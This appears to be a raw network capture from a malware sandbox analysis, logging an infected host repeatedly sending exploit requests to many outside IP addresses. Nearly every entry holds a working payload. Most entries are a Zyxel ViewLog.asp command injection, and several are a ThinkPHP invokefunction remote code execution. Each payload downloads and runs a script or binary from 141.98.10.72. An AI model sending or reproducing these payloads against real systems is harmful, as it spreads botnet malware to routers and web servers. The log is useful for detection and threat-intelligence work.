                                                        Feb 14, 2024 09:35:31.683044910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.434695005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:05.217866898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1058192.168.2.145308694.121.136.408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.515727997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1059192.168.2.145556431.200.82.498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.515813112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1060192.168.2.144702294.122.5.88080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.515954018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1061192.168.2.143384462.145.79.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.535259008 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.883399010 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.483431101 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:27.843163967 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:34.242918015 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:47.042562962 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.409379005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1062192.168.2.145077894.121.151.1958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:22.119189978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1063192.168.2.143741431.200.42.2358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:22.614989042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1064192.168.2.143884431.200.65.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:22.615041018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1065192.168.2.143723694.123.158.1488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:22.616700888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1066192.168.2.145387694.121.28.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:22.616753101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1067192.168.2.143757094.121.111.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:22.618590117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1068192.168.2.1454392112.184.52.17780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:23.061681986 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:23.349247932 CET504INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:22 GMT
                                                        Server: lighttpd/1.4.32
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1069192.168.2.1437008112.124.104.3180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:23.142034054 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:23.493627071 CET325INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 14 Feb 2024 08:35:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1070192.168.2.1459590112.78.4.20380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:23.144268990 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:23.513175011 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1071192.168.2.143309895.209.142.948080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:23.289069891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.283350945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1072192.168.2.1446054112.197.231.25180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:23.524238110 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:23.907632113 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 15:35:23 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1073192.168.2.143297095.214.99.14180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:23.599462032 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1074192.168.2.144994431.220.94.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:24.002907038 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.284985065 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1075192.168.2.144041431.136.175.1758080
                                                        TimestampBytes transferredDirectionData
